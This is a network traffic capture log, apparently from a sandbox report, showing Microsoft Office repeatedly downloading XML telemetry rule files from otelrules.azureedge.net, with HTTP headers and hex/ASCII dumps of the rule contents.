2024-12-08 12:31:36 UTC	192	OUT	GET /rules/rule120643v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:36 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:36 GMT Content-Type: text/xml Content-Length: 400 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2D62837" x-ms-request-id: 32c7b88d-b01e-003e-5b01-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123136Z-r1cf579d778t6txphC1EWRsd4400000005y0000000000brb x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:36 UTC	400	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.6	49805	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:36 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:37 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 30883f21-801e-00a0-1802-482196000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123137Z-r1cf579d778dc6d7hC1EWR2vs80000000630000000001g20 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:37 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.6	49807	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:37 UTC	192	OUT	GET /rules/rule120645v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:37 GMT Content-Type: text/xml Content-Length: 425 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BBA25094F" x-ms-request-id: d23b658c-101e-000b-2402-485e5c000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123137Z-r1cf579d778lntp7hC1EWR9gg400000004r00000000051gz x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:37 UTC	425	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.6	49806	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:37 UTC	192	OUT	GET /rules/rule120646v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:37 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:37 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT ETag: "0x8DC582BB2BE84FD" x-ms-request-id: 2968f52d-d01e-002b-1502-4825fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123137Z-r1cf579d778lntp7hC1EWR9gg400000004wg000000000nxc x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:37 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.6	49808	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:37 UTC	192	OUT	GET /rules/rule120647v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:38 GMT Content-Type: text/xml Content-Length: 448 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB389F49B" x-ms-request-id: 072142d6-401e-0029-0802-489b43000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123138Z-r1cf579d7784wpmvhC1EWRk4cn00000004x0000000000u4e x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:38 UTC	448	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.6	49809	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:38 UTC	192	OUT	GET /rules/rule120648v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:38 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:38 GMT Content-Type: text/xml Content-Length: 491 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B98B88612" x-ms-request-id: 836d2ba0-b01e-0070-7302-481cc0000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123138Z-r1cf579d77898tqwhC1EWRf9q800000005bg000000004ge6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:38 UTC	491	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.6	49810	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:38 UTC	192	OUT	GET /rules/rule120649v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:39 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT ETag: "0x8DC582BAEA4B445" x-ms-request-id: eee9af6d-a01e-001e-1905-4849ef000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123139Z-r1cf579d778zvkpnhC1EWRv23g00000005gg000000006c2g x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:39 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.6	49812	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:39 UTC	192	OUT	GET /rules/rule120651v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:39 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT ETag: "0x8DC582BA80D96A1" x-ms-request-id: 7b814a2b-101e-0017-4003-4847c7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123139Z-r1cf579d778xr2r4hC1EWRqvfs00000005dg000000002wtd x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:39 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
76	192.168.2.6	49811	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:39 UTC	192	OUT	GET /rules/rule120650v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:39 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:39 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B989EE75B" x-ms-request-id: 32c7c32d-b01e-003e-2b01-488e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123139Z-r1cf579d778t5c2lhC1EWRce3w00000005z0000000004evg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:39 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
77	192.168.2.6	49813	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:40 UTC	192	OUT	GET /rules/rule120652v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:40 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT ETag: "0x8DC582B97E6FCDD" x-ms-request-id: 45682ef5-801e-0048-7703-48f3fb000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123140Z-r1cf579d778dndrdhC1EWR4b2400000005000000000034gv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:40 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
78	192.168.2.6	49814	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:40 UTC	192	OUT	GET /rules/rule120653v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:40 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:40 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C710B28" x-ms-request-id: a7f5343d-701e-001e-5304-48f5e6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123140Z-r1cf579d778dfdgnhC1EWRd3w00000000520000000005rb4 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:40 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
79	192.168.2.6	49816	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-12-08 12:31:41 UTC	192	OUT	GET /rules/rule120654v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-12-08 12:31:41 UTC	470	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:41 GMT Content-Type: text/xml Content-Length: 477 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT ETag: "0x8DC582BA54DCC28" x-ms-request-id: 7407b41f-701e-0098-7b04-48395f000000 x-ms-version: 2018-03-28 x-azure-ref: 20241208T123141Z-r1cf579d77867vg8hC1EWR8knc0000000570000000002hkh x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-12-08 12:31:41 UTC	477	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S 